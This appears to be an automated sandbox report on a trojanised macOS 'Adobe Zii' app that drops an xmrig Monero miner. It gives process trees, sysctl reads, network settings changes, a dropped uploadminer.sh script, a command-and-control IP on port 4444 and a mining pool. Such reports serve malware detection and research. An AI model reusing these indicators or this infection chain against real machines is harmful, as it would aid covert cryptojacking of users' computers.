Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.551 -> queries PID 551Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.550 -> queries PID 550Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.548 -> queries PID 548Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.547 -> queries PID 547Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.546 -> queries PID 546Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.537 -> queries PID 537Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.535 -> queries PID 535Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.529 -> queries PID 529Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.528 -> queries PID 528Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.527 -> queries PID 527Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.499 -> queries PID 499Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.496 -> queries PID 496Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.494 -> queries PID 494Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.493 -> queries PID 493Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.466 -> queries PID 466Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.449 -> queries PID 449Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.428 -> queries PID 428Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.426 -> queries PID 426Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.424 -> queries PID 424Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.423 -> queries PID 423Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.422 -> queries PID 422Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.421 -> queries PID 421Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.414 -> queries PID 414Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.413 -> queries PID 413Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.407 -> queries PID 407Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.403 -> queries PID 403Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.402 -> queries PID 402Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.401 -> queries PID 401Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.400 -> queries PID 400Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.399 -> queries PID 399Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.392 -> queries PID 392Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.391 -> queries PID 391Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.390 -> queries PID 390Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.386 -> queries PID 386Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.384 -> queries PID 384Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.383 -> queries PID 383Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.382 -> queries PID 382Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.380 -> queries PID 380Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.379 -> queries PID 379Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.374 -> queries PID 374Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.369 -> queries PID 369Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.368 -> queries PID 368Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.367 -> queries PID 367Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.363 -> queries PID 363Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.362 -> queries PID 362Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.361 -> queries PID 361Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.357 -> queries PID 357Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.356 -> queries PID 356Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.355 -> queries PID 355Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.354 -> queries PID 354Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.353 -> queries PID 353Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.352 -> queries PID 352Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.350 -> queries PID 350Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.349 -> queries PID 349Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.347 -> queries PID 347Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.346 -> queries PID 346Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.344 -> queries PID 344Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.342 -> queries PID 342Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.341 -> queries PID 341Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.340 -> queries PID 340Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.339 -> queries PID 339Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.338 -> queries PID 338Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.336 -> queries PID 336Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.329 -> queries PID 329Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.327 -> queries PID 327Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.326 -> queries PID 326Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.325 -> queries PID 325Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.324 -> queries PID 324Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.322 -> queries PID 322Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.321 -> queries PID 321Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.319 -> queries PID 319Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.318 -> queries PID 318Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.317 -> queries PID 317Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.316 -> queries PID 316Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.314 -> queries PID 314Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.313 -> queries PID 313Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.312 -> queries PID 312Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.311 -> queries PID 311Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.310 -> queries PID 310Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.309 -> queries PID 309Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.308 -> queries PID 308Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.307 -> queries PID 307Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.306 -> queries PID 306Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.305 -> queries PID 305Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.304 -> queries PID 304Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.303 -> queries PID 303Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.302 -> queries PID 302Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.301 -> queries PID 301Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.299 -> queries PID 299Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.297 -> queries PID 297Jump to behavior
Reads hardware related sysctl valuesShow sources
Source: /Users/Shared/./xmrig (PID: 593)Sysctl read request: hw.ncpu (6.3)Jump to behavior
Source: /Users/Shared/./xmrig (PID: 617)Sysctl read request: hw.ncpu (6.3)Jump to behavior
Reads the systems OS release and/or typeShow sources
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579)Sysctl requested: kern.ostype (1.1)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579)Sysctl requested: kern.osrelease (1.2)Jump to behavior
Reads the systems hostnameShow sources
Source: /bin/bash (PID: 548)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 553)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 557)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 558)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 559)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 566)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 568)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 570)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 582)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 587)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 588)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 595)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 602)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 604)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 606)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Remote Access Functionality:

barindex
Writes files containing IP addresses of contacted hosts (e.g. command and control server)Show sources
Source: global traffic and dropped filesIP 46.226.108.171 found in file: /private/tmp/uploadminer.sh


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 65439 Sample: TnrhsyteX1 Startdate: 10/12/2018 Architecture: MAC Score: 80 127 46.226.108.171, 4444, 49234, 49236 GANDI-ASDomainnameregistrar-httpwwwgandinetFR France 2->127 129 pool.monero.hashvault.pro 37.187.163.200, 3333, 49249, 49257 OVHFR France 2->129 131 2 other IPs or domains 2->131 139 Antivirus detection for dropped file 2->139 141 Uses known network protocols on non-standard ports 2->141 143 Writes files containing IP addresses of contacted hosts (e.g. command and control server) 2->143 14 xpcproxy python Python 2->14         started        16 xpcproxy Application Stub 2->16         started        18 xpcproxy xmrig 2->18         started        signatures3 145 Detected Stratum mining protocol 129->145 147 Detected TCP or UDP traffic on non-standard ports 129->147 process4 process5 20 Python sh 14->20         started        22 Python sh 14->22         started        24 Python sh ps 14->24         started        27 sh id 14->27         started        29 bash 16->29         started        signatures6 31 sh 20->31         started        33 sh curl 20->33         started        37 sh chmod 20->37         started        39 sh ps 22->39         started        41 sh grep 22->41         started        43 sh grep 22->43         started        159 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 24->159 45 bash python Python 29->45         started        47 bash unzip 114 29->47         started        49 3 other processes 29->49 process7 file8 51 sh osascript 31->51         started        54 sh rm 31->54         started        56 sh rm 31->56         started        66 8 other processes 31->66 119 /private/tmp/uploadminer.sh, ASCII 33->119 dropped 133 Writes shell scripts with functionality to modify network settings 33->133 135 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 33->135 58 Python sh 45->58         started        60 Python sh 45->60         started        62 Python sh ps 45->62         started        64 sh id 45->64         started        121 /Users/henry/sampl...nts/MacOS/Adobe Zii, Mach-O 47->121 dropped signatures9 process10 file11 149 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 51->149 69 osascript security_authtrampoline uid uid sh 51->69         started        151 Executes the "rm" command used to delete files or directories 54->151 71 sh 58->71         started        73 sh curl 1 58->73         started        76 sh chmod 58->76         started        78 sh ps 60->78         started        80 sh grep 60->80         started        82 sh grep 60->82         started        123 /Users/Shared/xmrig, Mach-O 66->123 dropped signatures12 process13 signatures14 84 sh networksetup 1 69->84         started        87 sh networksetup 1 69->87         started        89 sh curl 69->89         started        91 sh osascript 71->91         started        93 sh rm 71->93         started        95 sh rm 71->95         started        97 8 other processes 71->97 161 Writes shell scripts with functionality to modify network settings 73->161 163 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 78->163 165 Reads process information of other processes 78->165 process15 signatures16 99 sh cp 84->99         started        103 sh cp 87->103         started        153 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 91->153 105 osascript security_authtrampoline uid uid sh 91->105         started        155 Executes the "rm" command used to delete files or directories 93->155 process17 file18 125 /Library/Preferenc...eferences.plist.old, XML 99->125 dropped 157 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 99->157 107 sh networksetup 2 105->107         started        110 sh networksetup 1 105->110         started        112 sh curl 105->112         started        signatures19 process20 signatures21 167 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 107->167 114 sh cp 1 107->114         started        117 sh cp 110->117         started        process22 signatures23 137 Many shell processes execute programs via execve syscall (may be indicative of malicious behavior) 114->137

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
/Users/Shared/xmrig100%AviraPUA/OSX.CoinMiner.kaotz

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.